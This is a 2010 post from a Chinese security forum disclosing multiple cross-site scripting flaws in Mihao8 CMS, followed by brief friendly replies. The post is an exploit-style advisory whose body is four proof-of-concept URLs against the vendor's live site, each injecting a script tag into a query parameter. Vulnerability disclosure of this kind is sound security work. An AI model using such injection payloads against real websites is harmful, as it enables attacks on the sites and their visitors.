首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]米号吧文章管理系统跨站0day漏洞
发表于: 2010-4-24 19:28 3117

[原创]米号吧文章管理系统跨站0day漏洞

riusksk 活跃值
41
2010-4-24 19:28
3117
# Exploit Title: Mihao8 CMS Multiple XSS Vulnerabilities
# Date: 2010-4-23
# Author: riusksk(泉哥)
# Blog:http://riusksk.blogbus.com
# Tested on: [Windows 7]

=========================================================================================================================
                         o8o                       oooo                 oooo        
                         `"'                       `888                 `888        
               oooo d8b oooo  oooo  oooo   .oooo.o  888  oooo   .oooo.o  888  oooo  
               `888""8P `888  `888  `888  d88(  "8  888 .8P'   d88(  "8  888 .8P'   
                888      888   888   888  `"Y88b.   888888.    `"Y88b.   888888.   
                888      888   888   888  o.  )88b  888 `88b.  o.  )88b  888 `88b.  
               d888b    o888o  `V88V"V8P' 8""888P' o888o o888o 8""888P' o888o o888o
=========================================================================================================================
                                      Mihao8 CMS Multiple XSS Vulnerabilities
=========================================================================================================================
# Exploit Code :
=====================================================0x1=================================================================
http://www.mihao8.com/index.asp?forumID=2&subclassID=1&act=1&classicID=1>"><script>alert("riusksk")</script>&page=1
=====================================================0x3=================================================================
http://www.mihao8.com/index.asp?forumID=2&subclassID=1&act=1>"><script>alert("riusksk")</script>&classicID=1&page=1
=====================================================0x4=================================================================
http://www.mihao8.com/index.asp?forumID=2&subclassID=1>"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=====================================================0x5=================================================================
http://www.mihao8.com/ssb.asp?forumID=1&subclassID=1>"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=====================================================EOF=================================================================

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (5)
riusksk
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
私信
2
这版块太冷清了,发点小小小的0day漏洞娱乐一下大众
2010-4-24 19:29
0
耳聋
雪    币: 66
活跃值: (26)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
3
泉哥的热心,佩服哈!
『软件使用』版块也冷清的很,泉哥发个小小小小的原创软件也来支持下哈!
2010-4-24 20:44
0
riusksk
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
私信
4
哪天不小小小小心路过的话,又刚好不小小小小心写了个破工具的时候,就可能会不小小小小心地发到那版块了
2010-4-24 20:52
0
耳聋
雪    币: 66
活跃值: (26)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
5
期待泉哥的作品!
2010-4-24 23:54
0
wangshutai
雪    币: 250
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
跨站,利用起来比较麻烦吧,不知道如何利用。呵呵。
2010-6-24 13:43
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//